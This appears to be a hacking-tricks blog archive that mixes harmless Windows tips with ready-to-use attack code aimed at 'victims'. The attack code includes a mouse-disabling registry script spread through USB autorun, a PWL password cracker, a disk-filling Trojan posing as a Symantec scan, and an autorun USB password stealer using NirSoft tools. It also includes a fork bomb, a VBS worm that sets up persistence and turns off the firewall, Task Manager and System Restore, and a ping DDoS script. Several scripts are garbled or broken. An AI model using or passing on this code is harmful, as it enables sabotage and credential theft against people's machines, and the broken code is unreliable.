Questions? Feedback? powered by Olark live chat software September 2013 | BM TRICKS 1

Disable Victim's Mouse

Monday 30 September 2013

Disabling Your Victim's Computer Mouse

Here's the Method-

We are going to create this virus using our usual Batch programming. In this post i am not only giving you simply the code but also explanation for the Batch program. So I hope that this post will make you happy.

Batch Programming Code:

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4

Explanation about this code-

"@echo off" This command will either turn ON, or OFF the command you put in a batch file from showing itself. (Don't confuse now, batch programming intro will make you clear).

set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" will access the registry stored in  this location "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"

The  Procedure to create this virus-

Okay now we will see the what are the procedure to follow in order to make this virus perfectly work in victim pc. 

Step 1:
  1. Copy the Batch code into notepad. 
  2. Save it as .bat extension (for eg: clickme.bat)

Step 2: 

     Now open the notepad and copy this code-


[autorun]
Open=filename.bat
Action=Mouse Disable

   Save it as "autorun.inf"

//don't forget to change the "filname.bat" with your filname.bat.

Step 3:
      
     Then copy the two files in your pen drive or victim's pen drive.

That's all we have finished.  Now bring your pen drive to your friend or victim home.  Now whenever the mouse is inserted ,the mouse will be disabled.

How to recover from this attack?

To recover from this attack ,you can follow these steps:-
Copy this code into the notepad:-

@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1

Save it with .bat extension(for eg: release.bat).
Now open this batch will re-enable the mouse actions.

Have Fun With Google

Fun With Google by Using I'm Feeling Lucky




Copy each of code and click I'm Feeling Lucky

google gravity
google sphere
google loco
epic google
find chuck norris
google flight simulator
let me google that for you
google gothic
google pacman
google guitar
google pirate
google rainbow
google reverse
elgoog
who is the cutest person in the world
Who is the cutest?
google pig latin
google blue
google pond
goglogo
google is gold
google 133t
ewmew fudd
google gangster
google bork
funny google
xx-klingon
xx-piglatin
xx-hacker
googles by kids
psychic google
2204355
Annoying Google
LOL Limewire
google gulp
Blackle
Google Mentalplex
Google Chart
Google Pigeonrank
Google Fool Animation
Googlunaplex
Google Virgle
Google gDay
Google Chrome 3D
Google Moon
Google Tisp

    C Program To Get All Passwords

    Saturday 28 September 2013

    Get All The Passwords Accessed From Your Computer Using C Program


    Get all the passwords accessed from your computer.......
    After you run the code, all passwords will be displayed..
     

    # include<stdio.h>
    # include<stdio.h>
    # include<process.h>
    # include<stdlib.h>
    # include<ctype.h>
    # include<conio.h>
    # include<mem.h>
    unsigned char huge Data[100001];
    unsigned char keystream[1001];
    int Rpoint[300];
    void main(int argc,char *argv[]){
    FILE *fd;
    int i,j;
    int size;
    char ch;
    char *name;
    int cracked;
    int sizemask;
    int maxr;
    int rsz;
    int pos;
    int Rall[300]; /* Resourse allocation table */
    if(argc<2){
    printf("usage: glide filename (username)");
    exit(1);
    }
    /* Read PWL file */
    fd=fopen(argv[1],"rb");
    if(fd==NULL){
    printf("can't open file %s",argv[1]);
    exit(1);
    }
    size=0;
    while(!feof(fd)){
    Data[size++]=fgetc(fd);
    }
    size--;
    fclose(fd);
    /* Find Username */
    name=argv[1];
    if(argc>2)name=argv[2];
    printf("Username:%s
    ",name);
    /* Copy encrypted text into keystream */
    cracked=size-0x0208;
    if(cracked<0)cracked=0;
    if(cracked>1000)cracked=1000;
    memcpy(keystream,Data+0x208,cracked);
    /* Generate 20 bytes of keystream */
    for(i=0;i<20;i++){
    ch=toupper(name[i]);
    if(ch==0)break;
    if(ch=='.')break;
    keystream[i]^=ch;
    };
    cracked=20;
    /* Find allocated resources */
    sizemask=keystream[0]+(keystream[1]<<8);
    printf("Sizemask:%04X
    ",sizemask);
    for(i=0;i<256;i++){
    if(Data[i]!=0xff){
    Rall[Data[i]]++;
    if(Data[i]>maxr)maxr=Data[i];
    }
    }
    maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
    divisible by 16 */
    /*Search after resources */
    Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
    for(i=0;i<maxr;i++){
    /* Find the size of current resourse */
    pos=Rpoint[i];
    rsz=Data[pos]+(Data[pos+1]<<8);
    rsz^=sizemask;
    printf("Analysing block with size:%04x (%d:%d)
    ",rsz,i,Rall[i]);
    if((Rall[i]==0)&&(rsz!=0)){
    printf("Unused resourse has nonzero size!!!
    ");
    printf("If last line produed any:You may try to recover
    ");
    printf("Press y to attempt the recovery
    ");
    ch=getch();
    if(ch!='y')exit(0);
    rsz=2;
    i=i-1;
    }
    pos=pos+rsz;
    /* Resourse have a tedency to have the wrong size for some reason*/
    /* Chech for correct size*/
    if(i<maxr-1){
    while(Data[pos+3]!=keystream[1]){
    printf(":",Data[pos+3]);
    pos=pos+2; /* Very rude may fail */
    }
    }
    pos+=2; /* Include pointer in size */
    Rpoint[i+1]=pos;
    }
    Rpoint[maxr]=size;
    /* Insert Table data into keystream*/
    for(i=0;i<=maxr;i++){
    keystream[20+2*i]^=Rpoint[i] & 0x00ff;
    keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
    }
    cracked+=maxr*2+2;
    printf("%d Bytes of ketstream recoverd
    ",cracked);
    /* Decrypt resources */
    for(i=0;i<maxr;i++){
    rsz=Rpoint[i+1]-Rpoint[i];
    if(rsz>cracked)rsz=cracked;
    printf("Resource[%d](%d)
    ",i,rsz);
    for(j=0;j<rsz;j++)
    printf("%c",Data[Rpoint[i]+j]^keystream[j]);
    printf("
    ");
    }
    exit(0);
    }

    C Programming Code That Accepts Password

    C Programming Code That Accepts Password

    The following is a simple code that accept the given password, and masks each entered character as "*" and even accept backspace. This is not for practical usage but for the beginners.



    #include<stdio.h>
    #include<conio.h>
    char pw[25],ch;
    int i;
    void main()
    {
    clrscr();
    puts(“Enter password”);
    while(1)
    {
    if(i<0)
    i=0;
    ch=getch();
    if(ch==13)
    break; /*13 is ASCII value of ENTER*/
    if(ch==8) /*ASCII value of BACKSPACE*/
    {
    putch(‘b’);
    putch(NULL);
    putch(‘b’);
    –i;
    continue;
    }
    pw[i++]=ch;
    ch=’*’;
    putch(ch);
    }
    pw[i]=’?;
    printf(“nn%s”,pw);
    getch();
    }

    Create A Trojan Horse In C Language

    Harmful Trojan Horse  in C Language


    Just copy this code in your notepad file and then save it as  any file name u want with extension .c
    For example, ( 123.c )

    #include<stdio.h>
    #include<conio.h>
    #include<dos.h>
    #include<stdlib.h>
    FILE *a,*t,*b;
    int r,status,vir_count;
    double i;
    char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

    void eatspace(void);
    void findroot(void);
    void showstatus(void);
    void draw(void);
    void accept(void);

    void main()
    {
    draw();
    accept();
    textcolor(WHITE);
    draw();
    gotoxy(12,8);
    cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
    sleep(3);
    gotoxy(12,8);
    delline();
    cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
    getch();
    gotoxy(12,8);
    delline();
    findroot();
    }

    void accept()
    {
    textcolor(LIGHTRED);
    gotoxy(1,8);
    cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

    if((choice=getch())!=13)
    exit(0);
    }

    void draw()
    {
    clrscr();
    textcolor(WHITE);
    gotoxy(12,2);
    cputs("********************************************************");
    gotoxy(12,6);
    cputs("********************************************************");
    gotoxy(12,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(67,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(14,4);
    cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
    }

    void findroot()
    {
    t=fopen("C:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    textcolor(WHITE);
    a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("D:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("E:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("F:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    if(t==NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
    getch();
    exit(1);
    }
    exit(1);
    }

    void eatspace()
    {
    textcolor(LIGHTRED);
    gotoxy(12,16);
    cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
    textcolor(WHITE);
    gotoxy(12,18);
    while(1)
    {
    for(r=1;r<4;r++)
    {
    for(i=1;i<900000;i++)
    {
    status=fputs(ch,b);
    if(status==EOF)
    {
    textcolor(WHITE);
    vir_count=random(120);
    draw();
    gotoxy(12,8);
    cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
    gotoxy(12,10);
    cprintf("PRESS ANY KEY TO CLOSE...");
    getch();
    break;
    }
    }
    cputs(".");
    if(status==EOF) break;
    }
    if(status==EOF) break;
    }
    exit(0);
    }

    void showstatus()
    {
    gotoxy(12,8);
    cputs("SCANNING THE SYSTEM FOR THREATS");
    gotoxy(12,10);
    cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
    gotoxy(12,13);
    cputs("SCAN IN PROGRESS. PLEASE WAIT...");
    }


    This is a program to eat up all your disk spaces. And this MAY harm your computer, so please try this at your own risk. We will not be responsible for any damage.

    If u want to stop this, just press CTRL+SHIFT+ESC to go to task manager and under process tab, look for space eater.c and end the process.

    You can download the file-

    Download
    click to begin
    3.79KB .c

    Facebook Picture Comments

    Thursday 26 September 2013

    Facebook Picture Comments

    Now-a-days, picture comments are widely used. So Here I am providing you 63 Facebook picture comments.
    If you like, please comment.

    Some of the picture comments-

    Give that man 10 Kg Pyaaj

    Aap mar jao na please

    Bakwaas Post

    Where is Admin Home

    Download
    click to begin
    754KB .zip

    I will be providing more pictures. Keep Visiting....

    Make Your Website User's Homepage

    Monday 23 September 2013

    Make Your Website User's Homepage





    How to make menus in Java

    Saturday 21 September 2013

    How to make menus in Java




    Slide show showing pictures combo

    Slide show showing pictures combo



    Use USB to steal passwords

    Use USB to steal passwords









    Step 1: Open notepad/wordpad
    type:

    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan

    Save this as AUTORUN.inf


    Step2: Open a new notepad/wordpad document
    Type:

    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start PasswordFox.exe /stext passwordfox.txt
    start OperaPassView.exe /stext OperaPassView.txt
    start ChromePass.exe /stext ChromePass.txt
    start Dialupass.exe /stext Dialupass.txt
    start netpass.exe /stext netpass.txt
    start WirelessKeyView.exe /stext WirelessKeyView.txt
    start BulletsPassView.exe /stext BulletsPassView.txt
    start VNCPassView.exe /stext VNCPassView.txt
    start OpenedFilesView.exe /stext OpenedFilesView.txt
    start ProduKey.exe /stext ProduKey.txt
    start USBDeview.exe /stext USBDeview.txt


    Save this as LAUNCH.bat

    Step3: Copy the autorun and launch file to your USB

    Step 4: Go to Nirsoft

    And download the programs which named in Step 2…
    [Ex:- mspass.exe mailpv.exe ]

    Step5: Extract the files you downloaded to your desktop and copy all the .exe files to your USB

    Step6: Remove and re-insert your USB

    Step7: Click on the option "perform a virus scan"
    (this is an exemple, if you want it to say something else go to the autorun file and change it)

    Step8: Go to "my computer"—> USB DRIVE and open it

    Now see some text files, if you open them you will see usernames and passwords


    NOTE: This only recovers passwords that have once been saved on your computer.

    Set Background Color (User Control)

    Set Background Color (User Control)



    Change Windows 8 Product Key

    How To Change Windows 8 Product Key To Complete Activation


    While I was installing Windows 8, one thing I found that was missing, at least to me, was the activation dialogue.
    No activation is fine and ok for me, until I wanted to change my Start screen’s background.
    Under the PC Settings > Personalize. It says “You need to activate Windows before you can personalize your PC.” So that leaves me no choice but to activate.

    2012-08-16_0022

    But …

    After poking around all the possible place, I just couldn’t find a UI that allows me to change or even enter my activation key. It seems like a time for a “hack” for it.
    Firstly, you need to go to the Start screen type “cmd” and right click. Make sure you choose run as “Administrator” from the bottom options.

    2012-08-16_0030_001
    Once the command prompt is launched with local admin privilege, run the following command to enter your activation key.

    2012-08-16_0031
    slmgr.vbs -ipk YOUR-ACTIVATION-KEY-HERE
    (If you have already installed a key, remove it by the code slmgr.vbs -upk
    2012-08-16_0032
    You will get a confirmation for the product key that you have entered.
    Then, run the following script to activate the product key
    slmgr.vbs -ato
    2012-08-16_0034
    Finally, you will get a confirmation on product activated successfully.

    2012-08-16_0034_001
    Now all you need to do is to restart your Windows 8.

    Shortcut Key Forms Excel

    Friday 20 September 2013

    Microsoft Excel shortcut keys

    Below is a listing of all the major shortcut keys in Microsoft Excel. See the computer shortcut page if you are looking for other shortcut keys used in other programs.
    ShortcutDescription
    F2Edit the selected cell.
    F3After a name has been created F3 will paste names.
    F4Repeat last action. For example, if you changed the color of text in another cell pressing F4 will change the text in cell to the same color.
    F5Go to a specific cell. For example, C6.
    F7Spell check selected text or document.
    F11Create chart from selected data.
    Ctrl + Shift + ;Enter the current time.
    Ctrl + ;Enter the current date.
    Alt + Shift + F1Insert New Worksheet.
    Alt + EnterWhile typing text in a cell pressing Alt + Enter will move to the next line allowing for multiple lines of text in one cell.
    Shift + F3Open the Excel formula window.
    Shift + F5Bring up search box.
    Ctrl + ASelect all contents of the worksheet.
    Ctrl + BBold highlighted selection.
    Ctrl + IItalic highlighted selection.
    Ctrl + KInsert link.
    Ctrl + UUnderline highlighted selection.
    Ctrl + 1Change the format of selected cells.
    Ctrl + 5Strikethrough highlighted selection.
    Ctrl + PBring up the print dialog box to begin printing.
    Ctrl + ZUndo last action.
    Ctrl + F3Open Excel Name Manager.
    Ctrl + F9Minimize current window.
    Ctrl + F10Maximize currently selected window.
    Ctrl + F6Switch between open workbooks or windows.
    Ctrl + Page upMove between Excel work sheets in the same Excel document.
    Ctrl + Page downMove between Excel work sheets in the same Excel document.
    Ctrl + TabMove between Two or more open Excel files.
    Alt + =Create a formula to sum all of the above cells
    Ctrl + 'Insert the value of the above cell into cell currently selected.
    Ctrl + Shift + !Format number in comma format.
    Ctrl + Shift + $Format number in currency format.
    Ctrl + Shift + #Format number in date format.
    Ctrl + Shift + %Format number in percentage format.
    Ctrl + Shift + ^Format number in scientific format.
    Ctrl + Shift + @Format number in time format.
    Ctrl + Arrow keyMove to next section of text.
    Ctrl + SpaceSelect entire column.
    Shift + SpaceSelect entire row.
    Ctrl + -Delete the slected column or row.
    Ctrl + Shift + =Insert a new column or row.
    Ctrl + HomeMove to cell A1.
    Ctrl + ~Switch between showing Excel formulas or their values in cells.

    USB Modem Not Working In Windows 8 (SOLVED)

    USB Modem Not Working Windows 8 (SOLVED)



    I have windows 8 RTM( Enterprise Edition ) running on Dell inspiron Laptop with Micromax MMX 300G.
    well all versions of Micromax MMX modem will work fine.
    Just follow the steps below:


    1. Uninstall the software if already installed.
    2. open the modem in new windows and set its ( modem_installation.exe and show_modem.exe ) compatibility to windows7 then press OK.
    3. Now install the software , then restart the system .
    4. Connect the modem and start the software ( it shows no device ) then exit the application from the task manager .
    5. Open the Device manager ( control panel > Administrative tools > Computer management )
    6. Go for Other devices , simply uninstall all the drivers related to modem there (better uninstall both with or without yellow mark)
    7. Go to Action menu and click on Scan for hardware changes .
    8. Now simply open the MMX usb manager and it works fine.

    Add Background Images to Folders in Windows

    Thursday 19 September 2013

    Add Background Images to Folders in Windows

    Suppose you have a music folder that contains all songs by your favorite singer. Would it not be great if instead of the plain white background, you could add the singer's image as the background of this folder?

    It is relatively easy to add background images to folders using a simple desktop.ini trick just as easily as you can change your Desktop's background.

    Desktop.ini is a system file that is used to customize the appearance and behavior of folders in Windows. We can use this ability of desktop.ini files to add backgrounds to folders just by adding a few lines of code.

    Folder Background in Windows
    This is how the background in folder looks like.

    Steps for adding backgrounds to Folders
    1. Open Notepad.
    2. Copy and paste the following code:-
    3. [{BE098140-A513-11D0-A3A4-00C04FD706EC}] iconarea_image="location of the image"
    4. You need to slightly modify this code on Windows Vista and Windows 7 as the ability to add folder backgrounds has been removed. So, if you use these versions of Windows, install AveFolder and then, replace [{BE098140-A513-11D0-A3A4-00C04FD706EC}] with [AveFolder] in the above code. To install this app, extract all the files and then, open the folder according to your installation of Windows (32 bit or 64 bit), right click install.bat and select Run as Administrator.
    5. In this code, iconarea_image is the parameter where the location of your image will go.
    6. Save the file as desktop.ini.
    7. Place this file in the folder where you want your personalized background.
    8. On Windows XP, you need to add system attribute to the folder where you want a background. To do this, open command prompt and execute "attrib +s D:\Music" (without quotes) if "D:\Music" is the location of your folder. If there are spaces in the location of your folder, you need to add double quotes around it. Windows Vista and 7 users need not add system attribute to folders.
    9. You might need to log off and log back on for the changes to take effect. Sometimes, AveFolder app fails to work in which case you need to restart Windows Explorer. I recommend you to create a System Restore point in case you do not like the results.

    You can hide this desktop.ini file if you feel that it is something that should not be visible in your folder.

    Tip: I am using this trick to have a personal picture as the background of the root folder of my flash drive. So, whenever I connect it to my Windows PC, the picture is displayed as the background. You can also do this but you should have the image in the drive itself. As you cannot assign a static location to the iconarea_image parameter (as the drive could be G:/ on one computer while F:/ on the other), you need to add the image's dynamic location. To do this, add "/{location of the image in flash drive}" as the value of iconarea_image. For example, if your image is located in the Pics folder in the flash drive, you need to have this value as:-

    iconarea_image=/Pics/Image.jpg

    It is important to note that the background to your flash drive will only be displayed on computers running Windows XP (if you have used the code for XP) or those computers running Windows 7 and Windows Vista that have AveFolder installed. Sadly, there is no way to make the background of your flash drive visible on all computers unless you modify your flash drive to automatically install this app on every PC you plug it in.

    If this trick does not work for you, do add a comment.

    Chat With Command Prompt

    Chat With Command Prompt

    If you want personal chat with a friend
    you don't need to download any yahoo messenger
    All you need is your friends IP address and Command Prompt.
    Firstly, open Notepad and enter:
    @echo off
    :A
    Cls
    echo MESSENGER
    set /p n=User:
    set /p m=Message:
    net send %n% %m%
    Pause
    Goto A
    Now save this as "Messenger.bat". Open the .bat file and in Command
    Prompt you should see:
    MESSENGER
    User:
    After "User" type the IP address of the computer you want to contact.
    After this, you should see this:
    Message:
    Now type in the message you wish to send.Before you press "Enter" it should look like this:
    MESSENGER
    User:27.196.391.193
    Message: Hi
    Now all you need to do is press "Enter", and start chatting!

    Make your Computer Welcome You

    Make your Computer Welcome You

    Do you watch movies? Have you always loved the way how Computers in movies welcome their users by calling out their names? I bet that you too would want to know how you can achieve similar results on your PC and have a computer said welcome.

    Then you are at the right place, this article describes exactly how you can make your computer welcome you like this.

    With this trick, you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username."

    Make Windows Greet you with a Custom Voice Message at Startup

    To use this trick, follow the instructions given below:-

    1. Click on Start. Navigate to All Programs, Accessories and Notepad.
    2. Copy and paste the exact code given below.
    Dim speaks, speech
    speaks="Welcome to your PC, Username"
    Set speech=CreateObject("sapi.spvoice")
    speech.Speak speaks
         3.  Replace Username with your own name.
         4.  Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs or "*.vbs".
         5.  Copy the saved file.
         6.  Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
         7.  Paste the file.



     Make your Computer Welcome you at startup

    Now when the next time you start your computer, Windows will welcome you in its own computerized voice.

    Note: For best results, it is recommended to change sound scheme to No Sounds.
    You can change the sound scheme to No Sounds by following the steps given below:-
    1. Go to Control Panel.
    2. Then click on Switch to Classic View.
    3. Then Click on Sounds and Audio Devices.
    4. Then Click on the Sounds Tab.
    5. Select No Sounds from the Sound Scheme option.
    6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
    7. Click on OK.
    Change Sound Scheme to No Sounds

    Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.

    Make your Computer Talk

    Make your Computer Talk

    Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

    To create one such talk script, follow the steps given below:-

    Make Your Computer Talk

    Steps
    1. Open Notepad.
    2. Copy and paste the exact code given below.
              Dim Message, Speak
              Message=InputBox("Enter text - created by http://bmtricks.tk","Speak")
              Set Speak=CreateObject("sapi.spvoice")
              Speak.Speak Message
          3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
          4.  Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.

      Now your Computer will speak / talk what you typed in Step 4. Try it yourself.

      Windows Compatibility: This VBS file can be executed on all versions of Windows including Windows XP, Windows Vista, Windows 7 and Windows 8.

      Personal Experience: I personally showed this trick to many of my friends and they were literally left awestruck. You too can impress your friends by making your PC talk and be the Computer Wiz.

      All Permanently Deleted Files Recovery Solution

      All (Ctrl+Alt+Del) Permanently deleted files Recovery solution

      Sometimes we delete the files permanently, and realize that deleting them is like a Blunder...

      For all those folks,
      Here is the solution

      Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
      Conditions : Only if the data on that drive is not re-occupied(or written). that means the space which was available after the deletion is not been occupied after the deletion.

      Click Here to download the .

      1)To start searching for the files,
      Select the drive from the Left panel of the Windows and Click the scan button.
      the Scan might take upto 10 secs.

      2)When the files search has been completed, it will show you the results with the name, typ, size and the last modified date of the searched file.

      3) Now you can select the file to be recover. This is an Open source application and available for All Windows OS(Windows XP/Vista/ 7).

      Posting to your blog

      Wednesday 18 September 2013

      Posting to your blog

      Yesterday, my friend told me that he could not make a new post on his blogger.
      So, I am describing here, how to make a new post on blogger,

      Watch a video on how to post to your blog
      Once you've logged into Blogger you'll see your Dashboard, showing your list of blogs. Click the orange pencil icon to create a new post:
      Create new post
      Next, you'll see the Post Editor. Start by giving your post a title (optional), then enter the post itself:
      Write a title
      When you're done, click the gray Preview button at the top to make sure it's ready to go. This will open a new tab in your browser where you can see what your post looks like on your blog. You can go back to the previous tab and edit your post further, or, if you're satisfied, just click Publish to publish your post. That's all there is to it!

      Create An eBomb

      Tuesday 17 September 2013

      How To Create an eBomb

      1. Click on Start-> Run -> NotePad.
      2. Copy the following code.

      @echo off
      msg * (YOUR MSG HERE)
      cls
      msg * (YOUR MSG HERE)
      cls
      msg * (YOUR MSG HERE)
      cls


      begin
      goto %random%

      :1
      start cmd.exe
      goto begin

      :2
      start paint.exe
      goto begin

      :3
      start pinball.exe
      goto begin :4
      start iexplore.exe
      goto begin
      :5
      start explorer.exe
      goto begin
      :6
      start iexplore.exe "http://bmtricks.tk"
      goto begin
      3. Now save the notepad as filename.bat
      4. Now dare to open the filename.bat

       Note:
       This filename.bat makes your pc slow because the above program code is to open multiple process at at time so that it make your pc hang.

      A New Worm Named Monaco

      Monday 16 September 2013

      New Worm Called Monaco




      Recently i have been working on a worm which effects the entire registry and disable task manager. If you execute this worm , your home page will be my website http://bmtricks.tk.



      Be careful do not run this worm. If you run this worm your home page will be my website
      Hehe...
      On Error Resume Next

      ' monaco By 315cu1t V.
      set fso=CreateObject("Scripting.FileSystemObject")
      set shell=CreateObject("Wscript.Shell")

      Function Hide(filename)
      Set file = fso.GetFile(filename)
      file.Attributes = -2
      End Function
      hide(WScript.ScriptFullName)
      path = "C:\windows\mfxjla.exe"
      fso.CopyFile Wscript.ScriptFullName,path
      hide(path)
      Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Sasaxquo", "C:\Windows\mfxjla.exe"
      path = "C:\windows\zhuchj.exe"
      fso.CopyFile Wscript.ScriptFullName,path
      hide(path)
      Shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Saszoqor", "C:\Windows\zhuchj.exe, "REG_SZ"
      path = "C:\Windows\eojyhnzad.exe"
      fso.CopyFile Wscript.ScriptFullName,path
      hide(path)
      Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\eojyhnzad", path, "REG_SZ"
      Shell.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

      Shell.regwrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page","http://bmtricks.tk", "REG_SZ"
      Shell.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://bmtricks.tk", "REG_SZ"
      Shell.regwrite "HKCU\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
      Shell.regwrite "HKCU\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
      Shell.regwrite "HKCU\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
      Shell.regwrite "HKLM\Software\Microsoft\Security Center\FirewallDisableNotify", "1", "REG_DWORD"
      Shell.regwrite "HKLM\Software\Microsoft\Security Center\UpdatesDisableNotify", "1", "REG_DWORD"
      Shell.regwrite "HKLM\Software\Microsoft\Security Center\AntiVirusDisableNotify", "1", "REG_DWORD"
      Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
      Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile\EnableFirewall","0","REG_DWORD"
      Shell.regwrite "HKCU\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
      Shell.regwrite "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile\EnableFirewall","0","REG_DWORD"
      Shell.run "",false
      Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR","1", "REG_DWORD"
      Shell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\sr","4", "REG_DWORD"
      Shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable","FFFFFF9D","REG_DWORD"
      ' Sample Plugin File
      ' This plugin is an example. Use it to guide you when making your own plugins

      msgtitle = "Alert" ' Set The Message Box Title
      msgtext = "hi there" 'Set The Message Box Text

      Call MsgBox(msgtext,65,msgtitle)

      ' :-------:
      Shell.RegWrite("HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictAnonymous", "1", REG_DWORD)
      Shell.RegWrite("HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\PasswordExpiryWarning", "0", "REG_DWORD")
      End if
      End if

      Now save the file with .vbs extension.
      That's it!! 

      DOS Attack Using Notepad

      DOS Attack Using Notepad

      1. Open Notepad.
      2. In Notepad paste the following  text.

      @ Echo off
      mode 67.16
      title DDOS Attack
      color 0A
      CLS
      echo.
      Batchfile With DDOS echo
      echo.
      set / px = Server-Target:
      echo.
      ping% x%
      @ ping.exe 127.0.0.1-n 5-w 1000> nul
      goto Next
      : Next
      echo.
      echo.
      echo.
      set / pm = ip Host:
      echo.
      set / pn = Packet Size:
      echo.
      : DDOS
      color 0c
      echo Attacking Server% m%
      m%-ping% i% n%-t> nul
      goto DDOS

      3. Now save the notepad with .bat extension.

      Usage: Double click on the create file and enter the server details. That's it!!

      How to disable automatic download of application updates in Windows 8 Store?

      How to disable automatic download of application updates in Windows 8 Store?


      This article will help you to disable automatic download of application update in Windows 8 store.
